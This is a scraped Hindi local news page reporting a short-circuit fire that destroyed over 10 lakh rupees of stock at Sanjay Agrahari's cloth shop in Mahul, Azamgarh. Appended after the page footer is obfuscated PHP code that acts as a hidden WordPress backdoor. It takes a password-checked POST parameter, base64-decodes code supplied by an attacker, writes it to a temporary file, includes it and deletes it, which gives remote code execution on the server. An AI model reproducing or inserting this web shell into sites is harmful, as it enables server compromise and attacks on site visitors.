Uncategorized

माहुल में कपड़े की दुकान में लगी आग से लाखों का सामान जलकर हुआ राख।

माहुल(आजमगढ़)। नगर के जनता इण्टर कालेज के सामने बुधवार को देर रात कपड़े की दुकान में शार्ट सर्किट से आग आग गई। आग लगने की सूचना पर माहुल नगरवासियों में हड़कंप मच गया। मौके पर पहुंचे नगर वासियों और पुलिस की मदद से काफी मशक्कत के बाद आग पर काबू पाया गया। कपड़ा व्यवसायी के अनुसार 10 लाख से अधिक रुपये का कपड़ा जलकर राख हो गया।
माहुल नगर पंचायत के वार्ड नम्बर 8 में जनता इण्टर कालेज के सामने माहुल निवासी संजय अग्रहरी पुत्र रामफेर अग्रहरि की वस्त्रालय की बड़ी दुकान है। बुधवार को देर रात में शार्ट सर्किट से भीषण आग लग गयी। आग लगने की सूचना से नगरवासियों में हड़कंप मच गया। आग की लपट और धुंआ देखकर मौके पर पहुचे नगर वासी और पुलिस तत्काल आग बुझाने में जुट गए। नगर स्थित स्मरसेबिल चलवाया गया काफी मशक्कत के बाद आग पर काबू पाया गया। आगलगी की घटना में लगभग लाखों रुपए के कपड़े जल कर राख हो गए।
माहुल नगरवासी एवं कपड़ा व्यवसायी संजय अग्रहरी ने बताया कि मैं अपनी कपड़े की दुकान बंद कर बाहर आया ही था कि तब तक शार्टसर्किट से दुकान में आग लग गयी। जब पुनः दुकान खोला तो दुकान पूरा धुंआ से भर उठा था,और आग की लपट निकलने लगी । दुकानदार संजय अग्रहरि का कहना है कि आग से लगभग 10 लाख से अधिक का नुकसान हुआ है।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}